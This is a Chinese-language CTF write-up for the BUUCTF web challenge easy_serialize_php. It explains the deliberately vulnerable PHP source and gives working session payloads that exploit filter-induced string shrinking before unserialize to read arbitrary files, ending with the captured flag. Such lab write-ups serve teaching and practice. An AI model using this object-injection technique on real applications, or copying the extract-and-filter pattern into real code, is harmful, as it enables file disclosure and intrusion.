94,【2】buuctf web [安洵杯 2019]easy_serialize_php

进入靶场

可以查看源代码

php 复制代码
<?php
// 从 GET 请求中获取名为 'f' 的参数值,并赋值给变量 $function
// @ 符号用于抑制可能出现的错误信息
$function = @$_GET['f'];

// 定义一个名为 filter 的函数,用于过滤字符串中的敏感词汇
function filter($img) {
    // 定义一个包含敏感词汇的数组,这些词汇会被过滤掉
    $filter_arr = array('php', 'flag', 'php5', 'php4', 'fl1g');
    // 使用 implode 函数将数组中的元素用 '|' 连接起来,并添加正则表达式的边界和不区分大小写的修饰符
    $filter = '/'. implode('|', $filter_arr) . '/i';
    // 使用 preg_replace 函数将字符串中匹配到的敏感词汇替换为空字符串
    return preg_replace($filter, '', $img);
}

// 检查 $_SESSION 数组是否存在
if ($_SESSION) {
    // 如果存在,则清空 $_SESSION 数组
    unset($_SESSION);
}

// 在 $_SESSION 数组中设置 'user' 键的值为 'guest'
$_SESSION["user"] = 'guest';
// 将从 GET 请求中获取的 'f' 参数的值存储到 $_SESSION 数组的 'function' 键中
$_SESSION['function'] = $function;

// 将 $_POST 数组中的变量导入到当前符号表中
// 这意味着 $_POST 中的键名会变成变量名,对应的值会赋给这些变量
extract($_POST);

// 检查 $function 变量是否为空
if (!$function) {
    // 如果为空,则输出一个链接,点击该链接会以 highlight_file 作为 'f' 参数值再次访问当前页面
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

// 检查 $_GET 请求中是否存在 'img_path' 参数
if (!$_GET['img_path']) {
    // 如果不存在,则将 'guest_img.png' 进行 Base64 编码后存储到 $_SESSION 数组的 'img' 键中
    $_SESSION['img'] = base64_encode('guest_img.png');
} else {
    // 如果存在,则先对 'img_path' 参数的值进行 Base64 编码,再进行 SHA - 1 哈希处理,最后存储到 $_SESSION 数组的 'img' 键中
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

// 对 $_SESSION 数组进行序列化,并调用 filter 函数过滤其中的敏感词汇
$serialize_info = filter(serialize($_SESSION));

// 检查 $function 变量的值是否为 'highlight_file'
if ($function == 'highlight_file') {
    // 如果是,则使用 highlight_file 函数高亮显示当前文件(index.php)的源代码
    highlight_file('index.php');
} 
// 检查 $function 变量的值是否为 'phpinfo'
else if ($function == 'phpinfo') {
    // 如果是,则使用 eval 函数执行 phpinfo(); 语句,输出 PHP 的配置信息
    eval('phpinfo();'); //maybe you can find something in here!
} 
// 检查 $function 变量的值是否为 'show_image'
else if ($function == 'show_image') {
    // 如果是,则对经过过滤和序列化的 $_SESSION 信息进行反序列化
    $userinfo = unserialize($serialize_info);
    // 对反序列化后得到的 'img' 键的值进行 Base64 解码,并读取该文件的内容然后输出
    echo file_get_contents(base64_decode($userinfo['img']));
}

关注这句话

并且源代码中说可以用get方式传递f

f=phpinfo

出现此页面,我们在里面找找信息

看到flag字眼了

肯定要读取这个文件

回顾源代码,寻找方法

根据源代码提示

我们先将文件名进行64编码

d0g3_f1ag.php

CTF在线工具-在线base编码|在线base解码|base16编码|base32编码|base64编码

复制代码
ZDBnM19mMWFnLnBocA== 

要使$userinfo()的内容中存在img=>ZDBnM19mMWFnLnBocA==的键值对

要使$serialzie_info则需要存在img=>ZDBnM19mMWFnLnBocA==的键值对的序列化内容

_SESSION[imgphpflag]=;s:3:"woc";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

_SESSION[imgphpflag]=;s:3:"woc";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

flag{ac37fca4-8362-4f2f-a3db-643939801681}

相关推荐
前端小巷子29 分钟前
Webpack 5模块联邦
前端·javascript·面试
玲小珑32 分钟前
Next.js 教程系列(十九)图像优化:next/image 与高级技巧
前端·next.js
晓得迷路了33 分钟前
栗子前端技术周刊第 91 期 - 新版 React Compiler 文档、2025 HTML 状态调查、Bun v1.2.19...
前端·javascript·react.js
江城开朗的豌豆40 分钟前
Vue和React中的key:为什么列表渲染必须加这玩意儿?
前端·vue.js·面试
江城开朗的豌豆1 小时前
前端路由傻傻分不清?route和router的区别,看完这篇别再搞混了!
前端·javascript·vue.js
pengzhuofan1 小时前
Web开发系列-第0章 Web介绍
前端
小鱼人爱编程1 小时前
Java基石--反射让你直捣黄龙
前端·spring boot·后端
JosieBook2 小时前
【web应用】如何进行前后端调试Debug? + 前端JavaScript调试Debug?
前端·chrome·debug
LBJ辉2 小时前
2. Webpack 高级配置
前端·javascript·webpack
zepcjsj08017 小时前
简单实现支付密码的页面及输入效果
android